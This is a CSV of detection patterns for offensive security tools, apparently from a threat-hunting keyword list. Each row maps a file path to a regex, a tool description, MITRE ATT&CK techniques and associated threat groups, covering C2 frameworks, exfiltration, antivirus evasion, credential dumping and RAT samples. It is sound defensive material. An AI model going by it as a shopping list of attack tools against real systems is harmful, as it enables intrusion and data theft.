"*/AttackerMITM.py*",".{0,1000}\/AttackerMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","#linux","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","5462"
"*/attacks/*.py",".{0,1000}\/attacks\/.{0,1000}\.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","5463"
"*/AttackServers/*",".{0,1000}\/AttackServers\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","5464"
"*/AttackSurfaceMapper.git*",".{0,1000}\/AttackSurfaceMapper\.git.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","1","N/A","N/A","6","10","1355","197","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z","5465"
"*/AtYourService.exe*",".{0,1000}\/AtYourService\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","5467"
"*/audio/exfiltrator.py*",".{0,1000}\/audio\/exfiltrator\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","5468"
"*/Augustus.git*",".{0,1000}\/Augustus\.git.{0,1000}","offensive_tool_keyword","Augustus","Augustus is a Golang loader that execute shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.","T1055.012 - T1027.002 - T1136.001 - T1562.001","TA0005 - TA0002 - TA0003","N/A","N/A","Exploitation tool","https://github.com/TunnelGRE/Augustus","1","1","N/A","N/A","6","2","131","26","2024-07-27T14:47:45Z","2023-08-21T15:08:40Z","5469"
"*/auth/cc2_auth.*",".{0,1000}\/auth\/cc2_auth\..{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","5470"
"*/auth-owners.nse*",".{0,1000}\/auth\-owners\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5471"
"*/auth-spoof.nse*",".{0,1000}\/auth\-spoof\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5472"
"*/autobloody.git*",".{0,1000}\/autobloody\.git.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","#linux","N/A","10","6","545","54","2024-11-14T13:07:54Z","2022-09-07T13:34:30Z","5473"
"*/autobloody/archive*",".{0,1000}\/autobloody\/archive.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","#linux","N/A","10","6","545","54","2024-11-14T13:07:54Z","2022-09-07T13:34:30Z","5474"
"*/AutoBlue-MS17-010.git*",".{0,1000}\/AutoBlue\-MS17\-010\.git.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","1","N/A","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","5475"
"*/AutoBypass.ps1*",".{0,1000}\/AutoBypass\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","5476"
"*/AutoCrypt.ahk*",".{0,1000}\/AutoCrypt\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","5477"
"*/autoNTDS.git*",".{0,1000}\/autoNTDS\.git.{0,1000}","offensive_tool_keyword","autoNTDS","autoNTDS is an automation script designed to simplify the process of dumping and cracking NTDS hashes using secretsdump.py and hashcat","T1003 - T1059 - T1021.002 - T1213","TA0006 - TA0008 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/hmaverickadams/autoNTDS","1","1","N/A","N/A","10","2","109","14","2023-10-31T22:03:58Z","2023-10-30T23:10:58Z","5486"
"*/autoNTDS.py*",".{0,1000}\/autoNTDS\.py.{0,1000}","offensive_tool_keyword","autoNTDS","autoNTDS is an automation script designed to simplify the process of dumping and cracking NTDS hashes using secretsdump.py and hashcat","T1003 - T1059 - T1021.002 - T1213","TA0006 - TA0008 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/hmaverickadams/autoNTDS","1","1","N/A","N/A","10","2","109","14","2023-10-31T22:03:58Z","2023-10-30T23:10:58Z","5487"
"*/AutoPwnKey.git*",".{0,1000}\/AutoPwnKey\.git.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","5488"
"*/autordpwn.php*",".{0,1000}\/autordpwn\.php.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","5489"
"*/AutoRDPwn/master/*",".{0,1000}\/AutoRDPwn\/master\/.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","5490"
"*/AutoRecon.git*",".{0,1000}\/AutoRecon\.git.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","5491"
"*/AutoSmuggle.git*",".{0,1000}\/AutoSmuggle\.git.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","N/A","9","3","240","26","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z","5492"
"*/AutoSUID.git*",".{0,1000}\/AutoSUID\.git.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","1","N/A","N/A","7","4","375","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z","5493"
"*/auxiliary/scanner/*",".{0,1000}\/auxiliary\/scanner\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","5494"
"*/AV_Evasion_Tool.git*",".{0,1000}\/AV_Evasion_Tool\.git.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","1","N/A","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","5495"
"*/avet.git*",".{0,1000}\/avet\.git.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","5496"
"*/avet_fabric.py*",".{0,1000}\/avet_fabric\.py.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","5497"
"*/avet_script_config.sh*",".{0,1000}\/avet_script_config\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","5498"
"*/AVKiller.git*",".{0,1000}\/AVKiller\.git.{0,1000}","offensive_tool_keyword","AVKiller","forcibly close some anti-virus processes through process injection (taking 360 Security Guard and 360 Anti-Virus as examples)","T1055.011 - T1089","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/1y0n/AVKiller","1","1","N/A","N/A","10","2","127","18","2023-12-26T05:47:55Z","2023-12-19T00:55:23Z","5499"
"*/avoid_badchars.py*",".{0,1000}\/avoid_badchars\.py.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tool","https://github.com/d4em0n/exrop","1","1","N/A","N/A","N/A","3","285","22","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z","5500"
"*/avred.git*",".{0,1000}\/avred\.git.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","N/A","9","5","465","55","2025-02-26T08:12:03Z","2022-05-19T12:12:34Z","5501"
"*/avred.py*",".{0,1000}\/avred\.py.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","N/A","9","5","465","55","2025-02-26T08:12:03Z","2022-05-19T12:12:34Z","5502"
"*/avred.py*",".{0,1000}\/avred\.py.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","5503"
"*/avredweb.py *",".{0,1000}\/avredweb\.py\s.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","N/A","9","5","465","55","2025-02-26T08:12:03Z","2022-05-19T12:12:34Z","5504"
"*/awesome-burp-extensions/*",".{0,1000}\/awesome\-burp\-extensions\/.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","network exploitation tool","9","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","5507"
"*/awesome-pentest*",".{0,1000}\/awesome\-pentest.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","5508"
"*/aws__enum_account*",".{0,1000}\/aws__enum_account.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","#linux","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","5509"
"*/aws__enum_account/main.py*",".{0,1000}\/aws__enum_account\/main\.py.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","#linux","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","5510"
"*/AWS-Loot*",".{0,1000}\/AWS\-Loot.{0,1000}","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tool","https://github.com/sebastian-mora/AWS-Loot","1","1","N/A","N/A","N/A","1","70","25","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z","5511"
"*/Azure-AccessPermissions.git*",".{0,1000}\/Azure\-AccessPermissions\.git.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","1","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","5512"
"*/AzureC2Relay*",".{0,1000}\/AzureC2Relay.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","N/A","10","10","220","49","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z","5513"
"*/AzureHound.ps1*",".{0,1000}\/AzureHound\.ps1.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","5514"
"*/AzureHound.ps1*",".{0,1000}\/AzureHound\.ps1.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","5515"
"*/B0-K RAT Majdi SaaD.exe*",".{0,1000}\/B0\-K\sRAT\sMajdi\sSaaD\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5516"
"*/B374K*",".{0,1000}\/B374K.{0,1000}","offensive_tool_keyword","b374k","This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel. connecting using ssh. ftp etc. All actions take place within a web browser","T1021 - T1028 - T1071 - T1105 - T1135","TA0002 - TA0003 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/b374k/b374k","1","0","N/A","N/A","N/A","10","2462","747","2023-07-06T20:23:03Z","2014-01-09T04:43:32Z","5517"
"*/BabelStrike.git*",".{0,1000}\/BabelStrike\.git.{0,1000}","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","1","N/A","N/A","1","2","132","23","2024-07-19T07:02:42Z","2023-01-10T07:59:00Z","5518"
"*/BabelStrike.py*",".{0,1000}\/BabelStrike\.py.{0,1000}","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","1","N/A","N/A","1","2","132","23","2024-07-19T07:02:42Z","2023-01-10T07:59:00Z","5519"
"*/Babylon RAT.exe*",".{0,1000}\/Babylon\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5520"
